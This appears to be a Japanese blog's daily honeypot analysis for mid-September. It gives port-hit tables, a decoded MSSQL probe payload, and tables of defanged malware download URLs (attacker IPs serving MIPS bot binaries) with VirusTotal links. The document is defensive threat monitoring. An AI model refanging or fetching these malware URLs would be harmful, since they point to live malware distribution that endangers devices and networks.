 

9/18 4746件
宛先ポート 件数 割合 サービス
445 1,824 38.43% SMB
22 671 14.14% SSH
3389 229 4.83% RDP
1433 74 1.56% Microsoft SQL Server
8080 73 1.54% Proxy
52869 46 0.97% D-Link, Realtek SDK
81 43 0.91% GoAhead Web Server 
636 34 0.72% LDAPS
6379 34 0.72% Redis
7657 33 0.70% ?

 

9/19 3089件
宛先ポート 件数 割合 サービス
445 1,540 49.85% SMB
3389 124 4.01% RDP
81 68 2.20% GoAhead Web Server 
22022 64 2.07% ?
1433 50 1.62% Microsoft SQL Server
52869 47 1.52% D-Link, Realtek SDK
8080 46 1.49% Proxy
6379 38 1.23% Redis
6666 36 1.17% IRC
137 32 1.04% NetBIOS Name Service

 

◾️マルウェアダウンロード
こちらは特に傾向の変化はありませんでした。

マルウェアURL 宛先ポート 件数 VT
hxxp://104[.]248[.]176[.]11/sora[.]mips 52869 4 https://www.virustotal.com/#/url/af74305b9f2f5f0fd8aa96f1c9a0dc9158136a4ba3161aea5f5caf69584e99a1/detection
hxxp://107[.]161[.]31[.]20/tenshimips 52869 20 https://www.virustotal.com/#/file/6222453c1c8e5c19425a6b75519210eae830e36ebcccc0d5882b9c14944593f3/detection
hxxp://107[.]191[.]99[.]230/elf[.]mips 52869 29 https://www.virustotal.com/#/file/5d72f22d6c387664b23cf4ea3080673885b73a9bea5caff7eb84fd3d0fd1a00b/detection
hxxp://107[.]191[.]99[.]41/elf[.]mips 52869 49 https://www.virustotal.com/ja/file/c5dff296b4f8a176223082527cd58402df2a7e5bcf4414f961d5312530ed5ee6/analysis/1533020160/
hxxp://146[.]185[.]253[.]127/keiji[.]mips 52869 4 https://www.virustotal.com/#/file/708f5e3b9c7e0b91f116b7c15c7f6f0a11499867afc2843ff4b890feae8e750a/detection
hxxp://176[.]32[.]33[.]165/mips 8081 1 https://www.virustotal.com/#/file/2a5336e77002a6ebbaa51206cb7a1142463b80bd1299b5a6635c1d3bd1533711/detection
hxxp://185[.]10[.]68[.]127/rtbin 52869 2 https://www.virustotal.com/ja/url/88391b0b3f2a711655750313557dc9cc13d2aa78a8741d5f395453164be5d7c4/analysis/
hxxp://188[.]209[.]52[.]142/c 5555 64 https://www.virustotal.com/#/url/8a392244d6648ac3fed7dcb98c79a24f89a5f6602ad007d2026e2cbf951547a8/detection
hxxp://207[.]148[.]78[.]152/bc 5555 3 https://www.virustotal.com/ja/url/c98d33aea5b9d6bbfc6db731d38ebdb16dfbaf65cb1896a628a0683f94b2b178/analysis/
hxxp://27[.]102[.]115[.]44/adbs2 5555 3 https://www.virustotal.com/ja/url/62fbd6898d5bd0adae9f5ad713b37f267d5b22c1b4b1ef564bcfa712f0fcf9b0/analysis/
hxxp://74[.]91[.]126[.]105/loli[.]lol[.]mips 52869 1 https://www.virustotal.com/#/url/8cc93d7feb2ed36620aa8c93d0cb4b548f00dde4c9dfddbb5c0790334e53f33b/detection
hxxp://77[.]87[.]77[.]250/izuku[.]mips 8081 1 https://www.virustotal.com/ja/file/b73ce9b0bd3fc58419443cbea301349af783d690ca1133d8548ea89d1bba003c/analysis/1535598509/
hxxp://80[.]211[.]106[.]251/mips 8081 4 https://www.virustotal.com/#/url/4869115c28db63cac236e2096511888609e4876831fbf67c229255157d7beffe/detection
hxxp://80[.]211[.]112[.]150/mips 52869 1 https://www.virustotal.com/ja/file/23a576856c353a434f8edf1d42c3c46beb48e8d39931043847ed193377decafe/analysis/1535606167/
hxxp://80[.]211[.]67[.]245/mips 52869 2 https://www.virustotal.com/#/file/0e344513a62220fcfe0ffebf9b722980eb74a155ff2c86e109311f7e3fe7375c/detection

以上、簡易分析となります。

ハニーポット簡易分析(39日目:9/16)

ハニーポット(Honeytrap)簡易分析の9/16日分となります。

<宛先ポート別TOP10>

9月16日:8594件    
宛先ポート 件数 割合 サービス
8545 2,905 33.80% Ethereum
1433 2,165 25.19% Microsoft SQL Server
445 1,580 18.39% SMB
22 88 1.02% SSH
3390 73 0.85% ?
3389 58 0.68% RDP
52869 38 0.44% D-Link, Realtek SDK
81 34 0.40% GoAhead Web Server 
465 33 0.38% SMTPS
2455 32 0.37% wago-io-system

◾️Microsoft SQL Serverへのアクセス
パッと、ペイロードを確認する限りは特に攻撃と思われる文字列はありませんでした。BOFなどであった場合、デコードしても特に意味はないと思うので、ここらの検知をどうするかは課題の一つだと考えています。IDSをちゃんと検知できるようにチューニングしなければ。。。。。

HEX表記:
1201002900000000000015000601001b000102001c000103001d0004ff0800015500000000f00b0000
デコード後:
...)............................U........


<マルウェアダウンロード>

マルウェアURL 件数 VT
hxxp://107[.]191[.]99[.]41/elf[.]mips 19 https://www.virustotal.com/ja/file/c5dff296b4f8a176223082527cd58402df2a7e5bcf4414f961d5312530ed5ee6/analysis/1533020160/
hxxp://188[.]209[.]52[.]142/c 15 https://www.virustotal.com/#/url/8a392244d6648ac3fed7dcb98c79a24f89a5f6602ad007d2026e2cbf951547a8/detection
hxxp://146[.]185[.]253[.]127/keiji[.]mips 9 https://www.virustotal.com/#/file/708f5e3b9c7e0b91f116b7c15c7f6f0a11499867afc2843ff4b890feae8e750a/detection
hxxp://74[.]91[.]126[.]105/loli[.]lol[.]mips 4 https://www.virustotal.com/#/url/8cc93d7feb2ed36620aa8c93d0cb4b548f00dde4c9dfddbb5c0790334e53f33b/detection
hxxp://80[.]211[.]106[.]251/mips 4 https://www.virustotal.com/#/url/4869115c28db63cac236e2096511888609e4876831fbf67c229255157d7beffe/detection
hxxp://27[.]102[.]115[.]44/adbs2 2 https://www.virustotal.com/ja/url/62fbd6898d5bd0adae9f5ad713b37f267d5b22c1b4b1ef564bcfa712f0fcf9b0/analysis/
hxxp://77[.]87[.]77[.]250/izuku[.]mips 1 https://www.virustotal.com/ja/file/b73ce9b0bd3fc58419443cbea301349af783d690ca1133d8548ea89d1bba003c/analysis/1535598509/

マルウェアは新規で検知したものはありませんでした。

以上、簡易分析となります。